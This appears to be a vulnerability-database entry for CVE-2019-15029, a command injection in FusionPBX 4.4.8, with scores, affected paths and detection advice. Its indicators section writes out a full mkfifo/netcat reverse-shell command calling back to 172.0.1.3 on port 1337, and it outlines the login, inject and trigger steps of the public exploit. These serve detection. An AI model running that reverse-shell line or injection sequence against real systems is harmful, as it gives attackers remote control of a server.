cbcvebase.
CVE-2019-15029
published 2019-09-05

CVE-2019-15029: FusionPBX 4.4.8 allows an attacker to execute arbitrary system commands by submitting a malicious command to the service_edit.php file (which will insert the…

PriorityP268high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
12.32%
95.7th percentile
FusionPBX 4.4.8 allows an attacker to execute arbitrary system commands by submitting a malicious command to the service_edit.php file (which will insert the malicious command into the database). To trigger the command, one needs to call the services.php file via a GET request with the service id followed by the parameter a=start to execute the stored command.

Affected

1 ranges
VendorProductVersion rangeFixed in
fusionpbxfusionpbx

Detection & IOCsextracted from sources · hover to see the quote

path/app/services/service_edit.php
path/app/services/services.php
url/app/services/services.php?id=<sid>&a=start
commandrm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/z
  • Detect POST requests to service_edit.php containing a `service_cmd_start` parameter — this is the injection point where arbitrary OS commands are stored in the database.
  • Detect GET requests to services.php with both an `id` parameter and `a=start` query parameter — this is the trigger that executes the stored command.
  • Alert on the named service `PwnedService3` appearing in FusionPBX service listings or database entries, as it is the default service name used by the public exploit.
  • Monitor for mkfifo-based reverse shell patterns (mkfifo + /bin/sh + nc) spawned by the FusionPBX web process, indicative of successful exploitation.
  • The exploit authenticates first via POST to /core/user_settings/user_dashboard.php before proceeding; a login followed immediately by a POST to service_edit.php and then a GET to services.php?a=start is a high-fidelity attack sequence to correlate.
  • ·The exploit requires valid credentials to FusionPBX before it can inject the malicious command; exploitation is authenticated, so credential compromise or weak/default passwords are a prerequisite.
  • ·The reverse-shell IP (172.0.1.3) and port (1337) in the public PoC are attacker-controlled placeholders; real-world attacks will use different callback addresses — do not rely on these specific values for detection.
  • ·The exploit was tested on Ubuntu 18.04 / PHP 7.2; detection and impact may vary on other OS/PHP combinations.

CVSS provenance

nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.